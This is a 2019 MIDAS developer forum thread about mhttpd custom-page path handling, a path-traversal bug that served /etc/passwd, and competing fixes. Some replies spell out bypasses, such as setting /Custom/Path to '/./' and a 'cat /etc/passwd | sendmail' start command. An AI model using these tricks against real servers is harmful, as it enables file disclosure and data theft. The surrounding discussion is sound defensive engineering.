Back Midas Rome Roody Rootana
  Midas DAQ System, Page 18 of 46  Not logged in ELOG logo
Entry  01 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
Before the days of javascript and ajax and web 2.0, MIDAS introduced "custom pages" for
building graphical display that could show "live" data from MIDAS and that could
have buttons and controls to operate slow controls equipment, etc.

This is how it works:
- entries from ODB /Custom are shown on the MIDAS menu -
an odb entry /Custom/Foo generate a link labeled "Foo"
to a special mhttpd url /CS/Foo.
- access to mhttpd url /CS/Foo invokes show_custom_page()
- show_custom_page() reads the custom page file name from ODB /Custom/Foo
- content of this file is served the web browser (after substituting the <odb> tags with values from ODB).
- in addition, it is possible to store the contents of the custom page in the ODB variable /Custom/Foo itself,
making it easy to edit the custom pages through the web browser (using the mhttpd odb editor).
- (if the value of /Custom/Foo has no "\n", then it's a file name, otherwise it is the page contents).
- if /Custom/Path exists, it is prepended to all file names.
- read more about this here:
https://midas.triumf.ca/MidasWiki/index.php//Custom_ODB_tree
https://midas.triumf.ca/MidasWiki/index.php/Internal_Custom_Page

This method required each custom web page served by mhttpd to have a corresponding
entry in ODB /Custom. Quite tedious for big experiments with a large number
of web pages (in T2K/ND280/FGD, for 1 page per frontend board, these entries
had to be created using a script, no practical to create them manually).

To fix this, in 2015, a modification was made to the code for ODB /Custom/Path. Instead of reading the file name
from ODB /Custom/Foo, the filename was made by adding /Custom/Path and the URL itself:
URL /CS/Foo.html will serve the file ODBValue["/Custom/Path"]/Foo.html. In this scheme,
the ODB entry /Custom/Foo.html is optional and is only needed to create a link in the MIDAS menu.

Commit: https://bitbucket.org/tmidas/midas/commits/5a2ef7d66df353684c4b40882a391b64a068f61f made on 2015-03-19.
Corresponding midas forum entry: https://midas.triumf.ca/elog/Midas/1109 made on 2015-09-09.

This change had the effect of creating 2 different operating modes for custom pages:
- if ODB /Custom/Path was absent (the default case), file names are taken from ODB /Custom/Foo.
- if ODB /Custom/Path is present (it has be created manually), file names are taken from the URLs.

These two modes could not be mixed, some experiments (TRIUMF MUSR/BNMR, CERN ALPHA, etc)
continued to use the old scheme (no /Custom/Path), some experiments switched
to the new scheme (DEAP, etc - TBC?).

(The best I can tell, this also create a security problem were using URLs containing "..", one can
force mhttpd to escape the /Custom/Path filename jail to cause it to serve arbitrary files from
the filesystem. Note that many web browsers remove the ".." entries from URLs, special tricks
are required to exploit this).

Then, in 2017, something called "new custom pages" was added to mhttpd interprete().
commit https://bitbucket.org/tmidas/midas/commits/c574a45c6da1290430f5a85a348fb629596a0de0 made on 2017-07-24
(I cannot find the corresponding explanation on the midas forum).

The best I can tell this code is intended to do the same thing that was done before:
map URLs like http://localhost:8080/Foo.html to file name ODBValue["/Custom/Path"]/Foo.html
and if this file exists, serve it to the browser.

However, the code has a bug - there is no check for absence of ODB /Custom/Path. If it does
not exist (as in experiments that do not use custom pages or use the old-style custom pages without
/Custom/Path), an empty string is used and URLs like http://localhost:8080/Foo.html becomes
mapped to /Foo.html (in the root of the file system, "/"!!!).

This introduced 3 problems:
- http://localhost:8080/etc/hosts serve the system password file (a security problem)
- because this code is before the odb code, it intercepts (and breaks) valid ODB URLs:
- on Linux, the ODB editor URL http://localhost:8080/root instead of showing the ODB root, attempts to serve the local subdirectory "/root" as a file
(fails, /root is a directory on most Linuxes). This is reported here: https://midas.triumf.ca/elog/Midas/1335 (2018-01-10)
- on MacOS, ODB editor URL http://localhost:8080/System instead of showing ODB /System, attempts to serve the local directory "/System" is a file (fails, 
/System is a subdirectory in MacOS). This is reported here: https://bitbucket.org/tmidas/midas/issues/156/mhttpd-odb-editor-cannot-open-system-on 
(2018-12-20)

The problem with broken access to the ODB editor URLs is fixed by commit:
https://bitbucket.org/tmidas/midas/commits/f071bc1daa4dc7ec582586659dd2339f1cd1fa21 (2018-12-21)
https://midas.triumf.ca/elog/Midas/1416

The fix unconditionally creates /Custom/Path and sets it to the value of $MIDAS_DIR or $MIDASSYS.

This breaks experiments that use custom pages with no /Custom/Path (ALPHA, BNMR/BNQR), see
https://bitbucket.org/tmidas/midas/issues/157/odb-custom-is-broken, and this is impossible
to fix by deleting /Custom/Path as it will be created again.

Also the problem with serving the system password file remains, see
https://midas.triumf.ca/elog/Midas/1425

So, a https://en.wikipedia.org/wiki/SNAFU

Since then, we have changed the mhttpd URL scheme: we no longer use URL subdirectories to navigate the ODB editor (we now use &odb_path=xxx)
and to refer to custom files (use now use &cmd=custom&page=xxx).

This liberates the mhttpd URL space for serving custom files without colliding with mhttpd internals and allows us to repair the current situation.

I will propose a solution in a follow-up message.

K.O.

P.S. The actual series of malfunctions is a bit more complicated than I described in this message,
but there is no need for getting to the very bottom bottom bottom of this as we can now do
a fairly clean solution.
    Reply  04 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
Parsing all URL in mhttpd to prevent /etc/passwd etc. to be returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
on the file system level when opening a file. The only escape there one could have is "..", which can be tested easily. 

Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
$MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:

$MIDASSYS/resource -> /usr/local/midas/resources
<exptab>/resources -> /home/users/exp/resources

These directories should be hard-wired into mhttpd, and not go through and ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
back-door. 

If users need a more complex structure, they can put soft links into these directories.

The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
then open the file. If not existing, do the same for the <exptab>/resources/ directory.

This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
bullet.

Comments are welcome.

Stefan
       Reply  04 Mar 2019, Thomas Lindner, Info, Gyrations of custom pages and ODB /Custom/Path 
Hi Stefan and Konstantin,

I think that this proposal sounds fairly reasonable.  I agree that we might as well move to a secure final solution at this point.  

One comment: since this change would break almost every experiment I have worked on for the last 4 years, it would be nice to add a command-line option to mhttpd that preserves the old /Custom/Path behavior.  This would allow experiments a transition 
period, so that they didn't immediately need to fix their setup.  The command-line option could be clearly marked as obsolete behaviour and could be removed within a year.

Cheers,
Thomas



> Parsing all URL in mhttpd to prevent /etc/passwd etc. to be returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> on the file system level when opening a file. The only escape there one could have is "..", which can be tested easily. 
> 
> Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> 
> $MIDASSYS/resource -> /usr/local/midas/resources
> <exptab>/resources -> /home/users/exp/resources
> 
> These directories should be hard-wired into mhttpd, and not go through and ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> back-door. 
> 
> If users need a more complex structure, they can put soft links into these directories.
> 
> The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> 
> This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> bullet.
> 
> Comments are welcome.
> 
> Stefan
          Reply  04 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
Sounds reasonable to me.

Stefan

> Hi Stefan and Konstantin,
> 
> I think that this proposal sounds fairly reasonable.  I agree that we might as well move to a secure final solution at this point.  
> 
> One comment: since this change would break almost every experiment I have worked on for the last 4 years, it would be nice to add a command-line option to mhttpd that preserves the old /Custom/Path behavior.  This would allow experiments a transition 
> period, so that they didn't immediately need to fix their setup.  The command-line option could be clearly marked as obsolete behaviour and could be removed within a year.
> 
> Cheers,
> Thomas
> 
> 
> 
> > Parsing all URL in mhttpd to prevent /etc/passwd etc. to be returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> > on the file system level when opening a file. The only escape there one could have is "..", which can be tested easily. 
> > 
> > Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> > $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> > experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> > 
> > $MIDASSYS/resource -> /usr/local/midas/resources
> > <exptab>/resources -> /home/users/exp/resources
> > 
> > These directories should be hard-wired into mhttpd, and not go through and ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> > back-door. 
> > 
> > If users need a more complex structure, they can put soft links into these directories.
> > 
> > The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> > then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> > 
> > This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> > bullet.
> > 
> > Comments are welcome.
> > 
> > Stefan
             Reply  04 Mar 2019, Suzannah Daviel, Info, Gyrations of custom pages and ODB /Custom/Path 
I see two separate issues here. 

One is restricting the custom pages to ONE directory such as 
<exptab>/resources -> /home/users/exp/resources
and its subdirectories which seems like a good solution for all the
reasons you've mentioned. 

The other issue is the use of the "Path" key in /Custom, which is used to differentiate
between the "new" way (all resources served from the Path directory) 
and the original way where all the custom keys are specified with their full directories.

Recent versions of Midas had broken the original behaviour by insisting on the presence of the
"Path" key.  Konstantin fixed this by allowing the "Path" key to take the value "".  It is true
that some experiments currently may be serving resources from more than one directory tree, but changing
to storage of all custom pages in one directory (and its subdirectories) does not necessarily mean that
the original way of serving resources must be made obsolete.
 
I actually like the original way of specifying the custom keys for the pages and resources under /Custom, which
is presently selected  without the /Custom/Path key present at all (older versions) or with the
/Custom/Path key set to "" (latest versions). I like it for debugging, and I like to be able to see 
at a glance what resource files are in use from /Custom. 

I have a suggestion:

The resources could still be served from the /Custom directory if desired, except now mhttpd will ALWAYS add the 
fixed path in front of the given paths in /Custom. This would mean a fixed path and a minimal disruption to older pages 
(the <script> and <link> statements in the HTML code to include the resources would not need to be changed).
The "/Path" key is no longer be useful, since the resource path is now fixed. Instead a key e.g. "FlagRS"  could 
be used to select the desired behaviour,  with the default being the "new" (no key present).

For example, the full directory paths in /custom
ScanParams&                     /home/users/online/custom/scan/scan_select_popup.html
mpet.css!                       /home/users/online/custom/rs/mpet.css
scanvoltages!                   /home/users/online/custom/scan/scan_voltages.js

would become subdirectory path(s)
ScanParams&                     custom/scan/scan_select_popup.html
mpet.css!                       custom/rs/mpet.css
scanvoltages!                   custom/scan/scan_voltages.js
FlagRS                          y

The pages would be served from /home/users/exp/resources/custom/...

Suzannah

 
> > Hi Stefan and Konstantin,
> > 
> > I think that this proposal sounds fairly reasonable.  I agree that we might as well move to a secure final solution at this point.  
> > 
> > One comment: since this change would break almost every experiment I have worked on for the last 4 years, it would be nice to add a command-line option to mhttpd that preserves the old /Custom/Path behavior.  This would allow experiments a transition 
> > period, so that they didn't immediately need to fix their setup.  The command-line option could be clearly marked as obsolete behaviour and could be removed within a year.
> > 
> > Cheers,
> > Thomas
> > 
> > 
> > 
> > > Parsing all URL in mhttpd to prevent /etc/passwd etc. to be returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> > > on the file system level when opening a file. The only escape there one could have is "..", which can be tested easily. 
> > > 
> > > Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> > > $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> > > experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> > > 
> > > $MIDASSYS/resource -> /usr/local/midas/resources
> > > <exptab>/resources -> /home/users/exp/resources
> > > 
> > > These directories should be hard-wired into mhttpd, and not go through and ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> > > back-door. 
> > > 
> > > If users need a more complex structure, they can put soft links into these directories.
> > > 
> > > The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> > > then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> > > 
> > > This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> > > bullet.
> > > 
> > > Comments are welcome.
> > > 
> > > Stefan
                Reply  04 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
Hi, guys, as I was exploring the code and the commit history on Thursday (git rules!) and
as I worked on getting the old custom files to work with Suzannah on Friday, I think
I know how I want this code to work. I think there is no need to break with the old
way of doing things and force every experiment to move things around if they want
to use the latest midas.

I will write more about this, but in the nutshell, I am happy with the current code:
- the old custom pages work (filename is taken from ODB, with /Custom/Path prepended if it exists; this is what we had for a very long time)
- the serving of new custom pages also works - via Stefan's code in interprete() where /Custom/File is added to the URL
  and if the file exists, we serve it. The only problem in that code was the missing check for absent or empty ODB /Custom/Path.
- the serving of new custom pages through the normal resource path (show_resource()) also works now,
   this serves files from $MIDASSYS/resource, from ODB /Experiment/Resource and a few other locations. (this code was there
   for a long time, but disabled because for a number of reasons, things like http://localhost:8080/Status.html did not work right,
   and after fixing a few buglets, they do now).

The serving of /etc/passwd I killed by forbidding "/" (the directory separator) in resource file names. I think this is safer
for enforcing a file jail compared to checking for "..".

I think the current code fixes all the reported problems (in conjunction with the change of the URL scheme) -
- /Custom/Path set to "" now works and provides the old way of doing custom pages
- /Custom/Path set to a directory name works and all Thomas's experiments should be good. the old custom files way *also* works, as long as the filenames in ODB are adjusted.
- URL /root and /System no longer try to serve system directories, plus /Custom/Path set to "/" is explicitly forbidden.
- mhttpd cannot serve /etc/passwd by default as "/" is forbidden in file names added to /Custom/Path. (I discount the case where mhttpd is running in /etc or /Custom/Path is set to /etc or symlinked to /etc)

But not all is good. The change of custom page URL scheme from /CS/... to top level or ?cmd=custom&page=...
cannot be swept under the rug - the user will have to make changes to their custom pages to adjust for it,
I see no way to avoid that. The current code catches and redirects/serves/helps with some of that,
i.e. pages loading custom files like "bnmr.css" still work even though bnmr.css is no longer under /CS/bnmr.css).

Again, apologies that things are moving faster than I can write them up. I am trying.


K.O.


> I see two separate issues here. 
> 
> One is restricting the custom pages to ONE directory such as 
> <exptab>/resources -> /home/users/exp/resources
> and its subdirectories which seems like a good solution for all the
> reasons you've mentioned. 
> 
> The other issue is the use of the "Path" key in /Custom, which is used to differentiate
> between the "new" way (all resources served from the Path directory) 
> and the original way where all the custom keys are specified with their full directories.
> 
> Recent versions of Midas had broken the original behaviour by insisting on the presence of the
> "Path" key.  Konstantin fixed this by allowing the "Path" key to take the value "".  It is true
> that some experiments currently may be serving resources from more than one directory tree, but changing
> to storage of all custom pages in one directory (and its subdirectories) does not necessarily mean that
> the original way of serving resources must be made obsolete.
>  
> I actually like the original way of specifying the custom keys for the pages and resources under /Custom, which
> is presently selected  without the /Custom/Path key present at all (older versions) or with the
> /Custom/Path key set to "" (latest versions). I like it for debugging, and I like to be able to see 
> at a glance what resource files are in use from /Custom. 
> 
> I have a suggestion:
> 
> The resources could still be served from the /Custom directory if desired, except now mhttpd will ALWAYS add the 
> fixed path in front of the given paths in /Custom. This would mean a fixed path and a minimal disruption to older pages 
> (the <script> and <link> statements in the HTML code to include the resources would not need to be changed).
> The "/Path" key is no longer be useful, since the resource path is now fixed. Instead a key e.g. "FlagRS"  could 
> be used to select the desired behaviour,  with the default being the "new" (no key present).
> 
> For example, the full directory paths in /custom
> ScanParams&                     /home/users/online/custom/scan/scan_select_popup.html
> mpet.css!                       /home/users/online/custom/rs/mpet.css
> scanvoltages!                   /home/users/online/custom/scan/scan_voltages.js
> 
> would become subdirectory path(s)
> ScanParams&                     custom/scan/scan_select_popup.html
> mpet.css!                       custom/rs/mpet.css
> scanvoltages!                   custom/scan/scan_voltages.js
> FlagRS                          y
> 
> The pages would be served from /home/users/exp/resources/custom/...
> 
> Suzannah
> 
>  
> > > Hi Stefan and Konstantin,
> > > 
> > > I think that this proposal sounds fairly reasonable.  I agree that we might as well move to a secure final solution at this point.  
> > > 
> > > One comment: since this change would break almost every experiment I have worked on for the last 4 years, it would be nice to add a command-line option to mhttpd that preserves the old /Custom/Path behavior.  This would allow experiments a transition 
> > > period, so that they didn't immediately need to fix their setup.  The command-line option could be clearly marked as obsolete behaviour and could be removed within a year.
> > > 
> > > Cheers,
> > > Thomas
> > > 
> > > 
> > > 
> > > > Parsing all URL in mhttpd to prevent /etc/passwd etc. to be returned is tricky, because people can use escape sequences etc. Therefore I think it is much better to restrict file access 
> > > > on the file system level when opening a file. The only escape there one could have is "..", which can be tested easily. 
> > > > 
> > > > Therefore, I propose to restrict file access to two well-defined directories, which is one system directory and one user directory. The system directory should be defined via 
> > > > $MIDASSYS/resources, and the user directory should be the experiment directory (as defined in exptab) followed by "resources". So if MIDASSYS equals to /usr/local/midas and the 
> > > > experiment directory equals to /home/users/exp for example, we would only have these two directories (and of course the subdirectories within these) served by mhttpd:
> > > > 
> > > > $MIDASSYS/resource -> /usr/local/midas/resources
> > > > <exptab>/resources -> /home/users/exp/resources
> > > > 
> > > > These directories should be hard-wired into mhttpd, and not go through and ODB entry, since otherwise one could manipulate the ODB entries (knowingly or unknowingly) and open a 
> > > > back-door. 
> > > > 
> > > > If users need a more complex structure, they can put soft links into these directories.
> > > > 
> > > > The code which opens a resource file should then first evaluate $MIDASSYS, then add "/resources/", then add the requested file name, make sure that there is no ".." in the file name, 
> > > > then open the file. If not existing, do the same for the <exptab>/resources/ directory.
> > > > 
> > > > This change will break most experiments, and forces people to move their custom pages to different directories, but I think it's the only clean solution and we just have to bite the 
> > > > bullet.
> > > > 
> > > > Comments are welcome.
> > > > 
> > > > Stefan
                   Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
First, I did not propose to give up the /Custom tree in the ODB, sorry for the misunderstanding. We still need it in order to display the menu with the custom pages at the left side navigation bar. In principle all can stay like it is, except we remove /Custom/Path and rewrite the file server to restrict it only 
to the two mentioned directories.

Second, to keep the compatibility with running experiments, we have to make the move over as simply as possible. Thomas proposed a "deprecated" mhttpd command line option. As an alternative, I propose to make a symbolic link from <exptab>/resources to where the old /Custom/Path was pointing 
to. This should work as well, and we don't have to implement a parameter in mhttpd.

Third, the /Custom/Path should really go away. We are all concerned that people can read security critical files from the whole file system. To read those files, people have to access to mhttpd, so they have to know at least the authentication credentials to pass the Apache firewall in front of mhttpd or 
whatever. This means they have access to the ODB, and then they can simply change /Custom/Path to "/" and voila - they have again access to /etc/passwd. This is why I propose symbolic links on the file system. This area is much better protected than the ODB, since people have to physically log into 
a machine to change it.

Best,
Stefan
                      Reply  05 Mar 2019, Thomas Lindner, Info, Gyrations of custom pages and ODB /Custom/Path 
> First, I did not propose to give up the /Custom tree in the ODB, sorry for the misunderstanding. We still need it in order to display the menu with the custom pages at the left side navigation bar. In principle all can stay like it is, except we remove /Custom/Path and rewrite the file server to restrict it only 
> to the two mentioned directories.
> 
> Second, to keep the compatibility with running experiments, we have to make the move over as simply as possible. Thomas proposed a "deprecated" mhttpd command line option. As an alternative, I propose to make a symbolic link from <exptab>/resources to where the old /Custom/Path was pointing 
> to. This should work as well, and we don't have to implement a parameter in mhttpd.

That sounds fine, as long as it is clearly documented.

> Third, the /Custom/Path should really go away. We are all concerned that people can read security critical files from the whole file system. To read those files, people have to access to mhttpd, so they have to know at least the authentication credentials to pass the Apache firewall in front of mhttpd or 
> whatever. This means they have access to the ODB, and then they can simply change /Custom/Path to "/" and voila - they have again access to /etc/passwd. This is why I propose symbolic links on the file system. This area is much better protected than the ODB, since people have to physically log into 
> a machine to change it.

Yes, I agree that /Custom/Path should go away.

Cheers,
Thomas
                         Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> 
> That sounds fine, as long as it is clearly documented.
> 

I am a true believer in the two-man rule. One person writes the code, another person
documents it - this keeps everything honest and ensures that at least one
person (the documenter) understands what is going on. (as the coder, I can easily
write documentation that nobody understands, or that is completely wrong).

> > Third, the /Custom/Path should really go away.
> Yes, I agree that /Custom/Path should go away.

/Custom/Path as a resource search path or
/Custom/Path that is prepended to file names of old-style custom pages?

The second use is safe and does not need to be removed.

The first use is now redundant - files are now also served through send_resource()
through the normal resource path, that includes ODB /Experiment/Resource
(something that has been there for a long time).

K.O.
                      Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> First, I did not propose to give up the /Custom tree in the ODB, sorry for the misunderstanding.
> We still need it in order to display the menu with the custom pages at the left side navigation bar.
> In principle all can stay like it is, except we remove /Custom/Path and rewrite the file server to restrict it only 
> to the two mentioned directories.
> 

We have several large installations at TRIUMF that use the old-style custom pages - MUSR, BNMR/BNQR, TITAN (and more?) -
none of these experiments are going away any time soon and none of these custom pages are rewriting themselves.

So, I think we are stuck with supporting old-style custom pages in the short and in the long term, unless we decide to abandon these existing users of MIDAS.

And the old-style custom pages come with the old-style scheme of keeping file names in ODB. Removing
it will require experiments to reorganize their filesystems (different custom pages may come from different
git repositories on different disks - not trivially placable all in the same directory).

Plus some people (including myself) like to have some things explicitly specified - I want to know that
this page loads this file without having to guess where in a search path it came from today.

>
> Thomas proposed a "deprecated" mhttpd command line option.
>

"deprecated" does not work.

"we removed it because it stopped working and we cannot fix it" works,
"do not use it for new experiments" works (until a user comes back with "but I really like this feature!")
"we will remove it at an unknown future date because we think nobody should use it" does not work.

>
> As an alternative, I propose to make a symbolic link from <exptab>/resources to where the old /Custom/Path was pointing 
> to. This should work as well, and we don't have to implement a parameter in mhttpd.
> 

All experiments at TRIUMF that use old-style custom pages do not use /Custom/Path. In the new scheme
of things, setting /Custom/Path to anything other than blank will break them.

>
> Third, the /Custom/Path should really go away.
>

For once, I agree. /Custom/Path did not exist and should not have been added.

> We are all concerned that people can read security critical files from the whole file system.

Only in the default configuration and in configurations that would realistically used by an experiment. This
excludes the case of "/Custom/Path" set to "/etc" - not the default and unlikely to be used by any experiment.

> To read those files, people have to access to mhttpd, so they have to know at least the authentication credentials to pass the Apache firewall in front of mhttpd or 
> whatever. This means they have access to the ODB, and then they can simply change /Custom/Path to "/" and voila - they have again access to /etc/passwd.

Nope. They have to set /Custom/Path to "/etc" or start mhttpd under "/etc" or point /Custom/Path to a symlink to /etc. (mhttpd will not serve "etc/passwd", "/" in the filename is not permitted).

> This is why I propose symbolic links on the file system.

Some people dislike symlinks.
Some filesystems do not implement symlinks. (should we prevent mhttpd from running on the ms-dos fat filesystem "just because"?)

> This area is much better protected than the ODB, since people have to physically log into 
> a machine to change it.

Nope. You can create symlinks from mhttpd by putting running the "ln -s" command from ODB "/Programs/xxx/Start Command"

K.O.
                         Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
I stop the discussion here because it goes in circles. We can't convince each others, so somebody has to give up, and that's me.

> We have several large installations at TRIUMF that use the old-style custom pages - MUSR, BNMR/BNQR, TITAN (and more?) -
> none of these experiments are going away any time soon and none of these custom pages are rewriting themselves.

Then you have a problem. Last time I told you that the new URL scheme breaks parts of the custom pages, especially the ones containing GIF images with labels on it. You then said "these experiments have to bite the bullet and 
change it", and I proceeded. Now you tell me that this will not happen. So please be aware that these experiments do have a problem and probably are stuck with an older midas version.

> > This area is much better protected than the ODB, since people have to physically log into 
> > a machine to change it.
> 
> Nope. You can create symlinks from mhttpd by putting running the "ln -s" command from ODB "/Programs/xxx/Start Command"

You can also set a start command "cat /etc/passwd | sendmail me@triumf.ca" and you get the password file ;-)

Stefan
                            Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> > We have several large installations at TRIUMF that use the old-style custom pages - MUSR, BNMR/BNQR, TITAN (and more?) -
> > none of these experiments are going away any time soon and none of these custom pages are rewriting themselves.
> 
> Then you have a problem. Last time I told you that the new URL scheme breaks parts of the custom pages, especially the ones containing GIF images with labels on it. You then said "these experiments have to bite the bullet and 
> change it", and I proceeded. Now you tell me that this will not happen. So please be aware that these experiments do have a problem and probably are stuck with an older midas version.
> 

Yes, there is a problem and some adjustment is needed.

I do not think the new URL scheme requires us to abandon existing experiments.

At this point I am trying to minimize the number of adjustments required, for example:

If we do not need to move files around (and create symlinks), it is good - so the old scheme of saving file names in ODB lives on
If we do not need to edit every file to adjust every URL, it is good - so now that http://blah/CS/custom_page is gone (no more "CS/"), http://blah/custom_page had to be implemented
If we do not need to replace all the ODB /Alias entries, http://blah/ODB_PATH now redirects to http://blah/?cmd=odb&odb_path=ODB_PATH and all the old aliases to ODB still work

I am going through these things as I discover them with Suzannah.

The biggest problem so far we have seen is with some pages having incorrect form submission
settings - some forms use the wrong form "action" attribute, which worked before, we do not know
why, and definitely does not work now. This is not something that we can fix on the midas side.

K.O.
                               Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
> The biggest problem so far we have seen is with some pages having incorrect form submission
> settings - some forms use the wrong form "action" attribute, which worked before, we do not know
> why, and definitely does not work now. This is not something that we can fix on the midas side.

Make sure you check any page which has a GIF image with bars and labels. I believe the new URL system has an issue there (mayby still an explicity /CS/... somewhere).

Stefan
                                  Reply  06 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> > The biggest problem so far we have seen is with some pages having incorrect form submission
> > settings - some forms use the wrong form "action" attribute, which worked before, we do not know
> > why, and definitely does not work now. This is not something that we can fix on the midas side.
> 
> Make sure you check any page which has a GIF image with bars and labels. I believe the new URL system has an issue there (mayby still an explicity /CS/... somewhere).
> 

Yes, we tried it with Suzannah and to my amazement it worked from the 1st try in her test experiment.

However the example in midas/examples/custom does not quite work, the gif file seems to be broken, displays as gibberish for me.

Also in the show_custom_page() I see code for "toggle" and "edit", but I have to example to test them.

K.O.
                   Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
> - mhttpd cannot serve /etc/passwd by default as "/" is forbidden in file names added to /Custom/Path.

You do this with a simple

if (custom_path == "/")

which does work but does not cover cases such as

"/./"
"/etc/../"
"/home/meg/../../"

Good luck with finding all the weird combinations which can lead to break ins. So we are where we were before.

Still, in my opinion we should not have a path in the ODB. The custom path should be hard-wired and combined with symbolic links if necessary. The custom HTML pages under /Custom in the ODB have to be scanned for ".."s.

Stefan
                      Reply  05 Mar 2019, Konstantin Olchanski, Info, Gyrations of custom pages and ODB /Custom/Path 
> > - mhttpd cannot serve /etc/passwd by default as "/" is forbidden in file names added to /Custom/Path.
> You do this with a simple
> if (custom_path == "/")
> which does work but does not cover cases such as
> "/./"

Hmm... and this is just fine. Since I do not allow "/" in the file name, they can
set the resource path to any alias for the root filesystem, but they cannot
get to "/etc/passwd" unless they run mhttpd in /etc or set /Custom/Path to "/etc".

All these cases are not normal use of mhttpd, not "oops, I made a mistake"
and not "I will kludge my paths just for today just for this one experiment". They
have to make an explicit decision to break the security.

These days, I am thinking that we should not try to prevent all insecure uses of midas,
but at least we should make the default configuration secure and disallow some of the more
obviously insecure configurations (i.e. do not permit password protection without https).

Take the root password as an example. Empty root passwd is not permitted, but
root password set to "root" is allowed (some password tools may throw a warning).

>
> Still, in my opinion we should not have a path in the ODB. The custom path should be hard-wired and combined with symbolic links if necessary. The custom HTML pages under /Custom in the ODB have to be scanned for ".."s.
> 

Stefan, we already allow execution of arbitrary commands via ODB "/Programs/xxx/Start Command".

So for all practical purposes, somebody with access to the mhttpd web pages also has shell access
to the user account running mhttpd.

K.O.
                         Reply  05 Mar 2019, Stefan Ritt, Info, Gyrations of custom pages and ODB /Custom/Path 
> > > - mhttpd cannot serve /etc/passwd by default as "/" is forbidden in file names added to /Custom/Path.
> > You do this with a simple
> > if (custom_path == "/")
> > which does work but does not cover cases such as
> > "/./"
> 
> Hmm... and this is just fine. Since I do not allow "/" in the file name, they can
> set the resource path to any alias for the root filesystem, but they cannot
> get to "/etc/passwd" unless they run mhttpd in /etc or set /Custom/Path to "/etc".

Just set 

/Custom/Path = /./ 

which is allowed right now and then access etc/passwd, which translates to /./etc/passwd and then you get the password file. 

We should make up our mind:

1) We trust each user who has access to mhttpd. The accessing /etc/passwd is not a problem and I don't understand all the fuzz we had recently. Why all the recent work?

2) We do not trust users connected via mhttpd, but we trust users who can log in to the online machine. If we do not trust users having access to mhttpd, then it does not make sense in my mind to fix one hole and keep a few other open. You correctly 
mentioned the /Programs/xxx/Start command, and there are a few others, like executing scripts directly. Either we fix all (known) holes or we don't bother.

3) We do not trust users who can log in to the online machine, since they can just cat /etc/passwd. But then why give them access to the online machine?

So which of the three options would you prefer?

 
> All these cases are not normal use of mhttpd, not "oops, I made a mistake"
> and not "I will kludge my paths just for today just for this one experiment". They
> have to make an explicit decision to break the security.

Accessing /etc/passwd is an explicit decision as well and does not come by "oops, I made a mistake"

> These days, I am thinking that we should not try to prevent all insecure uses of midas,
> but at least we should make the default configuration secure and disallow some of the more
> obviously insecure configurations (i.e. do not permit password protection without https).

Thanks to the nice public discussion here on the forum (and I still think this is the correct way to discuss these things), all forum subscribers are now aware of several security holes. So either they are evil, then we have to fix all (known) holes. Or we trust 
them, then we don't care.

> Stefan, we already allow execution of arbitrary commands via ODB "/Programs/xxx/Start Command".
> 
